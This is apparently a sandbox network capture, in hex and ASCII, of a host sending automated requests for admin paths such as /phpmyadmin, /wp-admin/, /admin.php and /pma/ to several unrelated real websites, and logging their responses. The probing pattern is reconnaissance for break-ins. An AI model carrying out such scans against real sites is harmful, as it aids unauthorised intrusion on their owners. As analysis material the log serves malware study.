2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:03 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.4	65204	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	178	OUT	GET /phpmyadmin HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	660	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: d8e87367-e72f-434d-90ca-9c4a1b35d990 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jZYjdRW%2BkZg0vthINl3uAZ1AClIZTiItElDrwl%2FhMzqnoDJ996oGypvWvTPqTakESfh8fWJRaVDtWlY0vCCzzYk6PwEs6K6NO8uA9T0aq%2BBMKSe178TK4VoR8cfMNgCt8wV3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d938d467bd-MIA
2023-12-22 20:15:02 UTC	709	IN	Data Raw: 31 63 30 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 47 72 6f 75 70 20 3d 20 22 74 68 65 6e 69 6c Data Ascii: 1c02<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au"; window.SiteEnvironment = "production"; window.SiteGroup = "thenil
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 65 79 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 65 6e 64 65 72 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 69 6e 67 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 54 6f 6b 65 6e 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 41 75 74 68 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 77 69 Data Ascii: ey: "5e860f35a7c8944203978db72ce66913", prerender: { rendering: false, domain: "https:\/\/www.thenile.com.au" }, userToken: "", }; window.Auth = false; wi
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 6c 65 2e 69 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 Data Ascii: harset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> Whoops... that page doesnt exist. 404 Error. </title><link rel="preconnect" href="//images.thenile.io"><link rel="preconnec
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 72 65 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 6f 6d 6d 61 6e 64 42 75 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 6e 2d 68 65 61 64 65 72 20 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6d 61 6c 6c 2d 33 20 6d 65 64 69 75 6d 2d 33 20 63 6f 6c 75 6d 6e 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 2d 6d 65 Data Ascii: re at TheNile.com.au with Free 30 Day Returns!"><script src="https://js.stripe.com/v3/"></script></head><body ng-app="tnApp" ng-controller="CommandBus"><div class="row tn-header collapse"><div class="small-3 medium-3 columns"><div class="category-me
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 35 37 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 35 30 20 31 31 31 76 36 34 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 36 37 63 2d 37 20 39 2e 30 38 30 32 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 73 34 20 31 2e 30 30 38 39 20 37 20 31 2e 30 30 38 39 63 30 20 30 2d 35 2e 35 20 37 2e 35 36 36 38 2d 31 34 20 31 30 2e 35 39 33 35 20 30 20 30 20 38 2e 35 20 32 2e 35 32 32 33 20 31 30 2e 35 20 32 2e 30 31 37 38 20 30 20 30 2d 38 20 31 30 2e 32 36 34 2d 31 36 2e 35 20 31 33 2e 37 36 34 20 30 20 30 20 36 2e 35 20 33 2e 33 38 37 20 39 2e 35 20 Data Ascii: 57" stroke-width="10" stroke-linecap="round" stroke-linejoin="round" d="M350 111v64" /><path d="M350 67c-7 9.0802-13.5 13.1158-13.5 13.1158s4 1.0089 7 1.0089c0 0-5.5 7.5668-14 10.5935 0 0 8.5 2.5223 10.5 2.0178 0 0-8 10.264-16.5 13.764 0 0 6.5 3.387 9.5
2023-12-22 20:15:02 UTC	993	IN	Data Raw: 3d 22 75 72 6c 28 23 61 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 37 20 37 33 63 2d 32 2e 31 36 37 20 31 2e 35 2d 31 30 2e 32 20 35 2d 31 39 20 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 20 38 34 2e 35 63 2d 33 20 32 2e 31 36 36 37 2d 31 36 2e 31 20 36 2e 38 2d 33 30 2e 35 20 36 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 33 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 33 20 39 36 2e 35 63 2d 32 2e 38 33 33 20 33 2d 31 35 2e 33 20 38 2e 39 2d 33 36 2e 35 20 38 2e 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 34 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 38 Data Ascii: ="url(#a)"><path d="M357 73c-2.167 1.5-10.2 5-19 5" stroke="url(#paint2_linear)" /><path d="M361 84.5c-3 2.1667-16.1 6.8-30.5 6" stroke="url(#paint3_linear)" /><path d="M363 96.5c-2.833 3-15.3 8.9-36.5 8.5" stroke="url(#paint4_linear)" /><path d="M368
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 33 65 31 31 0d 0a 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 33 31 22 20 63 79 3d 22 39 35 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 39 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 37 30 22 20 63 79 3d 22 39 36 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 30 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 32 36 22 20 63 79 3d 22 31 31 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 31 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 37 34 22 20 63 79 3d 22 31 31 31 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e Data Ascii: 3e11<circle cx="331" cy="95" r="2" fill="url(#paint9_linear)" /><circle cx="370" cy="96" r="2" fill="url(#paint10_linear)" /><circle cx="326" cy="112" r="2" fill="url(#paint11_linear)" /><circle cx="374" cy="111" r="2" fill="url(#paint12_linear)" />
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 34 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 34 2e 37 35 22 20 79 31 3d 22 39 36 2e 35 22 20 78 32 3d 22 33 34 34 2e 37 35 22 20 79 32 3d 22 31 30 35 2e 30 31 39 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 35 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 34 2e 32 35 22 20 79 31 3d 22 31 31 31 2e 35 22 20 78 32 3d 22 33 Data Ascii: ient id="paint4_linear" x1="344.75" y1="96.5" x2="344.75" y2="105.019" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint5_linear" x1="344.25" y1="111.5" x2="3
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 31 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 32 36 22 20 79 31 3d 22 31 31 30 22 20 78 32 3d 22 33 32 36 22 20 79 32 3d 22 31 31 34 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 32 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 37 34 22 20 79 31 3d 22 31 30 39 22 20 78 32 3d 22 33 37 34 22 20 79 32 3d 22 31 31 33 Data Ascii: radient id="paint11_linear" x1="326" y1="110" x2="326" y2="114" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint12_linear" x1="374" y1="109" x2="374" y2="113
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 37 2e 35 22 20 79 3d 22 37 30 2e 39 39 39 39 22 20 77 69 64 74 68 3d 22 36 34 2e 35 30 30 32 22 20 68 65 69 67 68 74 3d 22 38 36 2e 30 30 30 31 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 76 61 6c 75 65 73 3d 22 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 37 20 30 22 Data Ascii: 7.5" y="70.9999" width="64.5002" height="86.0001" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feColorMatrix in="SourceAlpha" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.4	65205	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	177	OUT	GET /wp-admin/ HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	631	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: http://www.thenile.com.au/wp-admin via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u18Jc7AQDUxeMTUJ8fxRoawHWEi%2FiCz9oDNJkoHcKcqevwOEUz1ns6f2kU%2B1E97aiidGBGcIskzQuZeu7Etb8HfRv9bt4hq3JxmQhaZ6wWGkXdCb2EnT19O6t61VnPvJJoPGwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d93cf4748d-MIA
2023-12-22 20:15:03 UTC	249	IN	Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/wp-admin">here</a>.</p></body></html>
2023-12-22 20:15:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.4	64958	52.165.155.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	265	OUT	GET /admin.php HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:02 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:02 UTC	1338	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);
2023-12-22 20:15:02 UTC	836	IN	Data Raw: 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 69 6e 69 74 5f 73 74 61 74 65 20 3d 20 27 27 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 28 6c 2c 20 69 2c 20 73 2c 20 74 2c 20 68 2c 20 75 2c 20 62 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 5b 27 4c 69 73 74 48 75 62 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 68 3b 20 6c 5b 68 5d 20 3d 20 6c 5b 68 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 6c 5b 68 5d 2e 71 20 3d 20 6c 5b 68 5d 2e 71 20 7c Data Ascii: t/javascript"> window.init_state = ''; </script> <script type="text/javascript"> (function (l, i, s, t, h, u, b) { l['ListHubAnalyticsObject'] = h; l[h] = l[h] \|\| function () { (l[h].q = l[h].q \|

Session ID	Source IP	Source Port	Destination IP	Destination Port
207	192.168.2.4	65173	216.194.166.146	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	172	OUT	GET /wp-admin/ HTTP/1.1 Host: adm-works.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:04 UTC	416	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:02 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://adm-works.com/wp-login.php?redirect_to=https%3A%2F%2Fadm-works.com%2Fwp-admin%2F&reauth=1 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
208	192.168.2.4	65466	104.17.71.73	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	393	OUT	GET /admin HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	277	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/admin Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b08da58ee6dc8-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
209	192.168.2.4	65522	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	322	OUT	GET /pma/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_R/J0Hk07qO/I535eqMxyclW91hxwGtsqVqdgb2hSbvtApvnIPrUS14aiq2mMfLODzOAFx/HLFv/wZXkkUZYUYw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
